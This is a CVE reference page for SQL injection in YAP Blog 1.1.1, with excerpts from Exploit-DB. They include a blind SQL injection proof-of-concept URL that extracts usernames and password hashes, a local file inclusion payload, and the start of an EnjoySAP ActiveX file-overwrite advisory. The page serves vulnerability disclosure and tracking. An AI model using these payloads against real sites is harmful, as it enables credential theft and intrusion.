CVE-2009-1038
published 2009-03-20CVE-2009-1038: Multiple SQL injection vulnerabilities in YAP Blog 1.1.1 allow remote attackers to execute arbitrary SQL commands via the (1) image_id parameter to…
PriorityP336medium6.5CVSS 2.0
AVNACLAuSCPIPAP
EXPLOIT
EPSS
0.88%
54.5th percentile
Multiple SQL injection vulnerabilities in YAP Blog 1.1.1 allow remote attackers to execute arbitrary SQL commands via the (1) image_id parameter to comments.php, and remote authenticated administrators to execute arbitrary SQL commands via the (2) user parameter in a modif action to admin/index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yap | yap_blog | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
EnjoySAP 6.4/7.1 - File Overwrite
exploitdb·2009-09-28
EnjoySAP 6.4/7.1 - File Overwrite
EnjoySAP 6.4/7.1 - File Overwrite
---
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-044
Application: EnjoySAP, SAP GUI for Windows 6.4 and 7.1
Versions Affected: Tested on 7100.2.7.1038 PL 7
Vendor URL: http://SAP.com
Bugs: insecure method, File owervriting
Exploits: YES
Reported: 02.07.2009
Vendor response: 02.07.2009
Date of Public Advisory: 22 ñåíò
CVE-number:
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
Description
SAP GUI for Windows 7.1 and 6.4 contains ActiveX component EAI WebViewer3D ( file WebViewer3D.dll) Lib GUID: {AFBBE070-7340-11d2-AA6B-00E02924C34E}
which is contains insecure method that can overwrite any file in system.
Details
Attacker can construct html page which call one of the wulnerable functions such as:
1)
Exploit-DB
YAP 1.1.1 - Blind SQL Injection / SQL Injection
exploitdb·2009-03-16
CVE-2009-1038 YAP 1.1.1 - Blind SQL Injection / SQL Injection
YAP 1.1.1 - Blind SQL Injection / SQL Injection
---
#######################################################################################################
[+] YAP 1.1.1 Blind SQL Injection/SQL Injection
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
########################################################################################################
[+] Blind SQL Injection
The default prefix for database tables is "yap_" .But can be changed
at installation.
PoC :
http://127.0.0.1/[path]/comments.php?image_id=1 and ascii(substring((SELECT concat(login,0x3a,pass) from yap_user limit 0,1),1,1))>97
First character of the username is char(97) , is "a" .
http://127.0.0.1/[path]/comments.php?image_id=1 and ascii(substring((SELECT concat(login,0x3a,pass) from yap_
Exploit-DB
YAP 1.1.1 - 'index.php' Local File Inclusion
exploitdb·2009-03-13
CVE-2009-1038 YAP 1.1.1 - 'index.php' Local File Inclusion
YAP 1.1.1 - 'index.php' Local File Inclusion
---
#########################################################
# YAP v1.1.1 Local File Inclusion Vulnerability #
#########################################################
# AUTHOR : Alkindiii
# CONTACT : Alkindiii [4T] islamway {D0T} net
# HOME : http://www.soqor.net
# Script : YAP
# Version : 1.1.1
# Download v1.1 : http://wildmary.net-sauvage.com/share/yap1.1.tar.gz
# Update to v1.1.1 : http://wildmary.net-sauvage.com/share/yap-patch1.1.1.zip
# EXPLOIT : http://www.site.com/index.php?page=[LFI]%00
# GREETZ : HACKERS PAL, Dr.Cr@ck, All soqor.net members, All Moroccan Hackers.
# milw0rm.com [2009-03-13]
No writeups or analysis indexed.
2009-03-20
Published